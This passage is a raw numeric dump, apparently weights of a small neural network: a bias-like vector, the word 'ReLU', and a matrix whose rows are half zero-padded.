[0.343884, -0.148704, -0.182344, 2.09282, 0.0573921, 1.07278, -3.5375, 0.290246, 1.78528, 0.570392, 0.102578, -0.867694, -1.88844, -1.11489, -0.445675, 0.694016, 1.27762, -1.29112, -1.34225, -0.159671, 0.645223, 0.988629, 0.516151, -2.38274, 0.676756, 0.761867, 0.0567606, -0.222461, 1.86957, 1.05205, -0.107629, 0.0906623, 2.55632, 0.875174, 0.0827916, -1.16245, 1.19683, 0.119459, 0.0523826, -0.25144, 0.971201, 0.414523, 0.559316, 0.711265, -3.24478, 0.58, 0.165873, -1.29327, -0.331041, -0.654165, 0.344, -0.1487, -0.1824, 2.094, 0.0574, 1.073, -3.537, 0.2903, 1.785, 0.5703, 0.1026, -0.8677, -1.889, -1.115, -0.4456, 0.694, 1.277, -1.291, -1.342, -0.1597, 0.645, 0.989, 0.516, -2.383, 0.677, 0.7617, 0.05676, -0.2224, 1.869, 1.052, -0.1076, 0.09064, 2.557, 0.875, 0.08276, -1.162, 1.197, 0.11945, 0.05237, -0.2515, 0.971, 0.4146, 0.559, 0.7114, -3.244, 0.58, 0.1659, -1.293, -0.331, -0.6543]
ReLU
[[0.0198897, -0.0404527, -0.277591, 0.0392536, 0.603609, 0.359966, -1.15858, 0.0895053, -0.0162616, 0.620436, -1.25868, 0.435105, 0.458625, 0.149091, 0.410564, 0.178846, -0.117309, 0.155218, -0.00361469, 0.0942395, -0.264847, -0.46865, -0.237021, -0.536885, -0.0563038, 0.232914, -0.0612577, 0.288811, -0.465449, 0.132133, -0.0728266, -1.02416, -0.0315447, -0.108128, -0.146657, 1.54259, -0.102172, -0.348272, -0.108634, 0.0917521, 0.118776, -0.490799, 0.0487253, 1.00787, 0.329056, -0.0960519, 0.188903, -0.556117, -0.321128, -4.48875, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.12478, 0.0416074, 0.0687742, -0.0500863, 0.377188, -0.0149096, 0.692364, 0.0749262, 0.137186, 0.0966477, -0.00770169, 0.691132, 0.0518415, 0.00739989, -0.106759, 0.215572, -0.100271, 0.00862341, 0.442313, 0.327501, 0.0345781, 0.0836259, -0.105687, 0.0685188, -0.153703, 0.546476, 0.0165681, -0.17239, 0.0519638, -0.010236, -0.214114, -0.363951, -0.0305532, -0.405473, 0.0400872, 0.716206, -0.0141947, -0.12781, -0.1698, 0.00784271, 0.0831355, -0.337734, -0.240157, 0.157107, 0.021761, 0.0733449, 0.00928964, 0.0824242, 0.0293015, 0.0386904, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.47445, -1.20772, -0.533325, -0.092422, 2.52431, -0.945134, 1.17228, 0.198356, -0.261637, 0.483425, -0.601054, -0.0990522, 0.575311, -0.828567, -0.515617, 1.23971, -0.646088, 1.26715, 2.29021, 0.252444, 0.268733, 0.842372, -0.183175, 0.150304, 0.254647, -0.0738135, -0.198423, 0.290538, -0.149387, -0.218876, -0.374599, -4.90366, -0.078181, -0.632357, 0.407041, -0.481849, 0.105639, -0.628227, -0.168271, 
0.66638, 0.77713, 0.53316, 0.469191, 1.29148, -1.13223, 0.0211952, 0.61959, -7.74552, -0.105717, 3.23942, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00951057, -0.00195054, 0.0289095, -0.082063, 0.32719, 0.0505229, -9.71707, 0.00550752, 0.0622835, -0.0572328, -0.197326, 0.0323883, -0.0442943, -0.00143272, 0.00060128, 0.118867, 0.0141389, 0.108605, -0.01479, 0.191224, -0.0560275, 0.0698511, 0.0638019, 0.00518239, 0.0124155, 0.0587427, -0.00408959, -0.0519665, -0.0166309, 0.0210846, -0.196554, 0.0853336, 0.00094628, 0.0446118, -0.084501, -0.312124, -0.000244352, -0.031797, -0.0342911, -0.013044, 0.0531631, -0.211627, -0.0555921, -0.0192542, -4.24262, 0.0448343, -0.143113, 0.0922184, -0.0254486, 0.0659032, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.935307, -2.01348, 0.25284, -0.0538865, -0.449774, 0.944573, -0.394612, -0.41814, -0.85797, -0.238316, 0.148548, 3.34056, -0.384637, -0.152855, 0.0564274, -1.65735, -1.35135, -0.982294, -1.02439, 0.162213, 0.215109, -0.0248712, -7.45046, 0.213618, 0.0702675, -2.46763, -5.18885, 0.44185, 0.00103554, 0.40183, 0.402682, -1.7952, -0.360388, 0.967219, -2.39407, 0.0189563, 0.114188, -0.3066, 1.18485, -0.961912, -0.569975, 1.07923, -1.90965, 1.77983, 0.111557, -0.436792, -6.99963, -0.744146, -0.0400978, 0.832671, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.201806, 0.251866, -0.490096, -0.0280296, 0.539718, 
0.0679513, -0.218965, -0.0102342, 0.141746, 0.29907, -0.0814449, 0.347362, 0.240542, -0.017297, -0.201359, -0.296228, -0.00980131, -0.133967, 0.133377, 0.478977, 0.048804, -0.0826984, -0.00102992, -0.182537, -0.0828709, 0.0769363, 0.0745554, 0.150575, -0.0278276, -0.0185181, 0.163408, -0.0303076, -0.0720884, 0.16526, 0.220965, 0.302963, 0.00507369, 0.0975644, -0.00625541, 0.000733538, 0.138197, -0.326087, 0.532902, -0.442966, 0.0558153, 0.0558344, -1.68548, 0.0454977, -0.0107947, 0.208993, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0666847, -0.0253962, 0.308655, 0.0338291, 0.331749, 0.097411, -2.07588, -0.201514, 0.130892, -0.183953, 0.00742339, 0.528813, 0.129563, 0.0518769, -0.136421, 0.139617, -0.151884, 0.0618889, -0.398714, -0.471988, -0.0115594, 0.0733779, 0.451285, -0.0740297, 0.474319, 0.0213045, 0.166832, -0.197219, -0.0465246, 0.178251, -0.227263, -0.0453916, -0.122528, -0.0650089, -0.146671, -0.0821081, 0.0136386, 0.154392, 0.15866, -0.282446, -0.0732708, -1.45058, -0.0336267, -0.0989725, -0.349539, -0.00940821, -0.0985911, 0.0211226, 0.0598756, -4.29466, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-5.00427, 0.196102, 0.0715269, -0.0464746, -0.571942, -0.607968, -3.72613, -2.35452, -0.0107038, -0.0102338, -0.162854, -0.169748, 0.266244, 0.322437, 0.394769, -0.000819109, -0.140204, 0.128465, 0.446514, 0.293356, 0.0226001, 0.0616584, -0.198242, -1.2365, 0.0117411, -0.482936, 0.334818, -0.11962, -0.193818, -0.161632, -0.190207, 0.0833688, -0.0630484, -0.22069, -0.0517292, -0.0874935, -0.13844, 0.00177128, -0.435294, 0.287744, 0.299813, 
-0.409951, 0.205094, 0.368056, -0.0311629, -0.237496, 0.294526, -0.0545813, -0.0305311, 0.188067, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.230212, 0.257645, 0.0558687, -0.129267, 0.124365, -0.153042, -13.5548, -0.0180085, -0.168386, -0.0382196, -0.242393, -0.101956, 0.0633759, 0.0192752, -0.095468, 0.0464098, -0.0563242, 0.0288101, 0.287405, -0.0197931, -0.0514541, 0.35247, 0.0311615, 0.052715, 0.077579, -0.0846086, 0.110325, 0.0709342, -0.110234, -0.00283828, 0.0502477, 0.0251561, -0.0294567, -0.0740749, 0.0304668, 0.486518, -0.0526309, 0.00238113, -0.290495, 0.071764, 0.150426, 0.367982, -0.0124935, 0.263409, -0.0547299, -0.0813385, 0.305185, 0.108303, 0.0164854, 0.16985, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.275657, -0.209983, -0.144089, 0.0174152, -0.26319, -0.00676406, -0.141265, 0.0150905, -0.018708, 0.082582, -0.0074294, -0.220016, 0.0831982, 0.067921, 0.0095902, -0.0334255, -0.0397525, 0.107058, -0.239416, -0.0410243, 0.0176434, -0.115426, 0.0566601, 0.00786331, -0.195441, -0.526434, 0.120704, -0.067479, -0.00943924, 0.0225083, -0.054562, 0.63492, 0.0255949, -0.167422, 0.0519159, 0.435645, -0.0195408, 0.0406585, -0.0303667, 0.0325866, 0.0999786, -0.116919, -0.017108, 0.216892, -0.232325, 0.0860438, -0.0495868, -0.0982608, 0.0234298, 0.00379567, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.272714, 0.829244, -3.90107, -2.10402, 
-5.10687, -8.75217, 0.0465555, -0.53462, 0.487414, 0.210014, 0.78361, 0.139895, -3.02957, 1.83718, -1.02206, 2.92484, -0.819569, -2.38438, 0.344952, -0.0429874, 0.603345, 1.83056, 5.02666, -0.081087, 2.88693, -6.58415, -5.555, 1.20216, 0.584584, 1.64198, 0.823565, -20.0916, -3.36609, -0.118841, 3.16146, 0.452014, -1.20608, -9.21369, 2.93469, -0.140688, -2.55597, 2.59165, -1.88994, 0.887057, -0.172963, -0.828126, 0.102691, -3.03089, 0.365761, -0.0930378, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0679461, -0.195916, 0.16952, -0.246394, 1.0181, 0.12309, -0.360755, -0.0468298, 0.00336101, 0.0197748, -0.320182, -0.216156, -0.100056, -0.0789411, -1.53699, 0.0175842, 0.0287724, -0.309856, 0.24331, 0.0813444, -0.505721, 0.320795, 0.17193, 0.16807, 0.203999, -0.00420966, -0.0782321, 0.0302612, -0.418631, -0.0220547, 0.0871929, -0.492828, 0.0349153, -0.338563, -0.00155861, 0.862777, -0.292731, -0.0421078, -0.148815, 0.07596, 0.127954, -0.300573, -0.085767, 0.32272, 0.091759, 0.0657804, 0.391725, -0.120698, -0.199395, -0.05246, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.218528, 0.0963922, 0.269749, -0.041633, 0.809256, 0.269737, -0.313619, -0.196264, -0.145953, -0.0746597, -0.137048, -0.228837, 0.15598, -0.250702, 0.420915, 0.287591, 0.161199, 0.019773, -0.131894, 0.423508, -0.185774, 0.285834, 0.163367, 0.12844, -0.0518864, -0.105136, 0.0131903, -0.13791, -0.0311046, 0.124779, 0.129509, 0.141044, -0.0205755, -0.160281, 0.0570478, -0.268819, -0.224209, 0.0740425, -0.126724, 0.0294541, 0.0347832, 0.0618416, -0.00632139, 0.296443, -0.0600648, 0.016263, 
0.380712, -0.0640574, -0.0622073, 0.0971152, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0436474, -0.0298087, -0.14988, -0.113116, 0.0848855, 0.082643, -1.93417, -0.0301826, 0.110709, 0.167787, -0.307157, -0.39557, 0.0301285, 0.10357, -11.0484, -0.0342867, -0.11412, -0.213341, 0.977588, -0.0518196, -0.235971, -0.0459661, 0.506094, -0.0184792, -0.337622, -0.324197, 0.175483, 0.0743243, -0.0523952, -3.14567, -0.128594, -0.120705, -0.0305571, 0.116315, -0.0628323, 0.658526, -0.0923211, -0.0382784, 0.0118329, 0.0348346, -0.357506, -1.03295, -0.0290241, 0.0732027, -0.212804, -0.0142649, -0.102122, 0.0304184, -0.715536, 0.436484, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.68243, -0.17072, -0.319248, 0.118979, 1.96849, 0.409732, -3.36174, 0.0643817, -6.66286, -0.514641, 0.296831, 0.220771, -1.85411, 0.203729, 1.33806, 0.522016, -0.020273, 0.274436, 0.932702, 0.597552, -0.62165, -0.0199416, -0.141941, 0.579189, 0.867244, 0.716547, 0.25847, -0.0993358, -0.498766, -0.265733, -0.90761, -0.776178, -0.323001, -1.30278, 1.08366, -2.4701, -0.277873, -6.48003, -1.66253, 0.129899, 0.395711, 0.543235, 0.46578, 2.22622, -0.0482305, -0.0865136, 0.485549, 1.08002, 0.00859485, 0.350852, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.13921, 0.179277, -0.294366, -0.00802601, -4.32188, 0.0587101, -0.486855, -0.0210261, -0.14786, 0.264653, -0.342642, 0.00536665, -0.171982, 
-0.0487724, -0.0862592, 0.026717, -0.0798149, 0.0878861, -0.0984905, 0.0659401, -0.00298882, -0.0521552, -0.31863, 0.0418259, 0.602772, -0.0336505, -0.194111, 0.0918568, -0.0199109, -0.0475386, 0.114137, 0.274512, -0.0020315, 0.136451, -0.0403213, -0.944392, -0.0408341, -0.182266, -0.42663, 0.0831194, 0.162978, -0.0348014, 0.0523761, 0.294997, -2.99867, 0.0331841, 0.0294317, -0.0724005, -0.143845, -4.98435, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00332703, 0.334581, -0.0439898, 0.0167441, 0.117819, 0.0702821, 0.629481, -0.0337133, 0.034801, 0.079667, -0.0319666, 0.278502, -0.0232784, -0.044806, -0.0591184, -0.0423848, -0.0409006, 0.0678595, 0.076632, 0.314002, 0.0112597, 0.105288, -0.0169719, -0.0264637, -0.0816537, 0.0382217, 0.0135921, -0.151093, 0.0370202, 0.029789, -0.123578, -0.25147, -0.0420174, -0.270411, 0.0712157, 0.213186, 0.0014644, -0.131762, -0.101606, -0.00893192, 0.00393341, 0.0756914, -0.196468, -0.0144556, 0.0146362, 0.0565129, 0.141059, -0.0310966, -0.000726053, -0.0896467, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0433162, 1.58955, -0.667105, -0.091773, 1.13252, -0.77035, 0.0208934, 0.709856, -0.117233, 0.261234, -0.020898, -0.978, -0.139766, 0.462314, -0.275348, -0.202163, -0.0858469, -2.39986, -0.0461281, 0.385406, -7.7382e-05, -0.0665704, 0.52345, -0.162508, 0.53821, 0.959434, -0.637208, 0.309124, 0.104505, 0.042557, 0.609722, -0.964998, -0.44457, -0.659763, 0.621852, 0.405847, -0.348235, 0.0132588, -0.440028, -1.24403, -0.0842776, 0.84972, -0.0538346, 1.20414, 0.131087, 0.133048, -3.22756, -0.328796, 0.00782389, -0.201408, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.5523, -0.602873, 0.597125, -1.00441, -0.257599, -0.91655, -2.13973, 0.102161, 0.270494, 0.347687, -0.121125, -3.94878, -8.89872, 0.389165, 0.382029, -0.251777, -0.100012, 0.109148, 0.332837, 0.70738, -0.323896, 0.477587, -8.80549, -1.54642, 0.595579, 0.41861, 1.04418, -1.07095, -6.59843, -0.309844, 0.0171748, 1.35858, -0.796002, -1.77651, -5.69002, 0.859866, -1.81583, 0.0206551, -0.60633, -1.4828, -0.137665, -1.15438, 1.63555, 0.444153, -0.309471, -0.301987, 2.01048, -0.761288, -0.102032, 0.200867, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.000892677, -0.0987551, -0.0635048, 0.00899302, -0.172508, -0.026062, -0.190673, -0.0182574, -0.0198497, -0.0173256, -0.0405101, -0.545256, -0.100293, 0.00328637, 0.0400577, -0.139615, 0.0141782, -0.109145, 0.111689, 0.135806, -0.0296077, 0.0230913, 0.0610583, -0.103507, 0.103383, -0.738322, 0.0228774, -0.0614437, -0.00484427, -0.0142132, 0.0676433, -0.0783575, 0.0214801, 0.109481, 0.0395514, -0.580651, -0.0621782, -0.0225799, -0.0587909, 0.0285735, 0.0437886, 0.0375812, -0.0603999, -0.0651216, -0.095949, 0.0765383, 0.093772, 0.00783948, -0.00268929, -0.0251691, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0632891, -0.110602, -0.0480748, -0.0178147, -0.0833551, -0.05743, -0.750529, -0.0438618, -0.0504125, -0.106762, 0.119024, 0.455624, -0.0106961, 0.00577347, 
-0.00320729, -0.0614625, 0.0402448, 0.0327475, -0.102614, -0.132129, -0.00990827, -0.00906967, -0.118944, 0.0688663, 0.124913, -0.13933, 0.0696416, 0.0649565, -0.00770107, -0.0236689, 0.282124, -0.00019066, 0.0640069, -0.0603495, 0.0130785, -0.371818, 0.0375105, -0.0412379, 0.0231959, -0.051222, -0.041858, 0.29148, -0.0464367, -0.265376, -0.0195458, 0.0659533, -0.401076, -0.055565, 0.000236368, -0.0866756, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-2.86537, 1.22957, -1.33339, -0.990793, -4.61914, 0.130496, -0.729716, -0.433011, -0.219488, -0.0248907, 0.0106786, -0.278505, 0.302346, 0.0700928, 0.197389, 0.639315, -0.121222, -1.61772, -0.275718, 0.494009, -0.0197905, 0.000639123, -2.28071, -0.376904, 0.344001, 0.567198, 0.638964, -0.034761, 0.0211639, -1.61883, -0.198462, 1.32542, -0.0661963, -2.80263, -0.0215901, -1.12066, -0.126275, -0.27476, 0.150371, -1.44402, -0.266481, 0.746744, 0.00387438, -4.09873, -0.399614, 0.0669503, -0.720556, 0.0339061, 0.065541, 0.186405, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.979547, 1.07139, 0.784348, -2.78449, 2.48911, -5.83602, -0.313225, -2.78774, 0.668405, -1.18664, -0.383716, -6.67197, -0.455182, -0.636727, -0.647615, -0.0690024, -0.141081, -0.209129, -0.794158, 0.332777, -0.600919, 0.576879, 0.319476, -10.0014, 0.456261, -2.82611, -0.366903, 0.44986, 0.14223, 0.0660273, 0.627272, 3.67585, -0.461515, -0.255719, 0.119046, 0.968955, 0.00816525, -4.73109, -0.460942, -0.00917594, -0.2392, -0.132123, 1.53455, 0.883328, -0.805511, 0.077092, 0.0763631, -8.85894, 0.0887412, -0.41298, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.153644, -0.287349, 0.808311, -0.628978, 0.663088, 0.23185, -0.256736, 0.0352762, 0.222856, 1.18616, -0.566045, -0.0675674, -0.165601, -0.163859, 0.200155, 0.023995, -0.0960529, 0.253796, 0.769675, 0.725459, -0.0855869, -0.244877, 1.19597, -1.6685, 0.253541, 0.188197, 0.397901, 0.460387, -0.0351397, 0.0681529, -0.528977, 0.540457, 0.158271, 0.323115, -0.434301, 1.21686, -0.238481, 0.165752, 0.10242, 0.0873295, -0.0938522, -2.85917, -0.0471219, -0.479273, -0.791096, -0.306436, -0.893522, -0.0318296, -0.0640807, -2.26259, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.531871, 0.440242, -1.63629, -0.0417775, 0.127859, -0.0519937, -1.15597, -0.190037, -0.0934847, 0.275287, 0.00866005, -4.39248, -3.97998, 0.0861073, 0.109046, 0.247382, -0.137702, -0.0222782, -0.266128, -0.304263, -0.00655528, 0.150133, 0.352539, -0.010888, 0.114355, 0.463151, 0.0169575, -0.207989, -0.0483871, 0.154826, 0.248027, -0.18449, -0.0473515, -0.251402, 0.28419, 1.38438, 0.0113555, 0.126817, 0.609463, -0.301245, -0.0413303, -0.663619, -0.701459, 0.0868543, -0.279274, -0.142292, -0.305523, 0.0615831, -0.0132336, 0.0221011, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00230329, 0.148607, -0.128516, -0.00179663, -0.00163784, 0.00534232, -0.214901, 0.00741416, 0.0136522, -0.196705, -0.0119092, 1.15581, 0.015444, 0.0196616, -0.00546345, 0.0637994, -0.027786, -0.0848974, 
